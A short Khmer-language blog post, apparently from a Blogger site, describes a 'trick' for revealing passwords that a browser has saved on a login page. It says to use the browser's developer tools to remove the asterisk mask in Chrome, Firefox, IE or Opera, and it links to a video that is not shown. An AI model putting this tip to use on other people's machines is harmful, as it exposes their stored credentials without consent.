កម្មវិធី​រុករក​បណ្ដាញ​ (​​web browser) របស់​អ្នក​នឹង​មិន​បង្ហាញ​ពាក្យ​សម្ងាត់​នៅ​ក្នុង​អត្ថបទ​ធម្មតា​នោះ​ទេ​ តែ​អ្នក​អាច​ប្រើ​developer tool ដែលមាននៅលើ web browser ដើម្បី​យក​ចេញ​នូវរបាំង​ និង​បង្ហាញ​ពី​តួ​អក្សរ​ដែល​បាន​លាក់​នៅ​ពីក្រោយ​សញ្ញា​ផ្កាយ​នេះ​។ 

អ្នក​គ្រាន់តែប្រើ​ល្បិច​នេះ​ទៅ ​នឹងឃើញ​មាន​ពាក្យ​សម្ងាត់​ណា​មួយ​ដែល​ត្រូវ​បាន​រក្សា​ទុក​នៅ​លើ​ log in page របស់ Chrome​, Firefox, IE ឬ Opera 
សូមទស្សនាវីដេអូខាងក្រោមៈ
ចុចអានបន្ត»

    If you would like to receive our RSS updates via email, simply enter your email address below click subscribe.

Blogger template. Proudly Powered by Blogger.
back to top